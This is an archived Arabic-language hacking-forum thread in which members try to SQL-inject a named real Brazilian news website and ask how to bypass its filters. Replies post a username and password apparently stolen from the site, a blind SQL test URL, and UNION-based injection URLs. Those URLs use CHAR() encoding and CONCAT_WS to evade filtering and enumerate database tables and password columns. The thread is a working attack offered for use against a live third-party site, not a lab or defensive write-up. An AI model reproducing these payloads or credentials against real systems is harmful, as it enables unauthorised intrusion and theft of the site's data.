:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/forumdisplay.php?f=343)
-   -   الى محتفي الحقن (نسيـــــــــــم هههههههه ) الكل يدخل (http://www.vbspiders.com/vb/showthread.php?t=63038)

cisco_security 06-26-2012 08:16 PM
الى محتفي الحقن (نسيـــــــــــم هههههههه ) الكل يدخل
 
معانا موقع
حاولت انا و ميدو نحقنه بس طبعا انا نسيت الحقن من زمان و ما حقنت موقع
الموقع ذا فيه كثير فلتره ياريت احد يشرح لنا كيف طريقه التخطي
الموقع :
كود PHP:
http://www.valorcontabil.com.br/supernews/?noticia=15 
بانتظار ردودكم
BlackMask
Midou868

This is for you aircrack-ng

mido868 06-26-2012 08:28 PM
رد: الى محتفي الحقن (نسيـــــــــــم هههههههه ) الكل يدخل
 
اقتباس:
المشاركة الأصلية كتبت بواسطة BlackMask (المشاركة 440225)
معانا موقع
حاولت انا و ميدو نحقنه بس طبعا انا نسيت الحقن من زمان و ما حقنت موقع
الموقع ذا فيه كثير فلتره ياريت احد يشرح لنا كيف طريقه التخطي
الموقع :
كود PHP:
http://www.valorcontabil.com.br/supernews/?noticia=15 
بانتظار ردودكم
BlackMask
Midou868

This is for you aircrack-ng
لقد قام المشاغب بحلها هههههههههههههه
user=valorbm
pass=2003vc

aircrack -ng 06-26-2012 08:33 PM
رد: الى محتفي الحقن (نسيـــــــــــم هههههههه ) الكل يدخل
 
BLIND SQL
http://www.valorcontabil.com.br/supe...elect%201%29=1

mido868 06-26-2012 08:44 PM
رد: الى محتفي الحقن (نسيـــــــــــم هههههههه ) الكل يدخل
 
اقتباس:
المشاركة الأصلية كتبت بواسطة aircrack -ng (المشاركة 440227)
لقد كنا نريد فقط تخطى الامر concat لهذا الموقع

aircrack -ng 06-26-2012 08:51 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة mido868 (المشاركة 440228)
لقد كنا نريد فقط تخطى الامر concat لهذا الموقع
ماتنساش دايما قيم ascll hex symbol هي مهمة جدا

ميدو ماتنساش التقييم

كود PHP:
http://www.valorcontabil.com.br/supernews/?noticia=(-1)UNION(SELECT(1),(2),(3),(4),(5),(6),(7)) 
ادخال قيم السيمبول

كود PHP:
http://www.valorcontabil.com.br/supernews/?noticia=(-1)UNION(SELECT(1),(2),(3),(4),(CONCAT_WS(CHAR(32,58,32),table_name,column_name,table_schema)),(6),(7)+from+information_schema.columns) 
كود PHP:
http://www.valorcontabil.com.br/supernews/?noticia=(-1)UNION(SELECT(1),(2),(3),(4),(CONCAT_WS(CHAR(32,58,32),table_name,column_name,table_schema)),(6),(7)+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)) 
كملو كل شيء سهل

mido868 06-26-2012 09:30 PM
رد: الى محتفي الحقن (نسيـــــــــــم هههههههه ) الكل يدخل
 


الساعة الآن 08:08 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0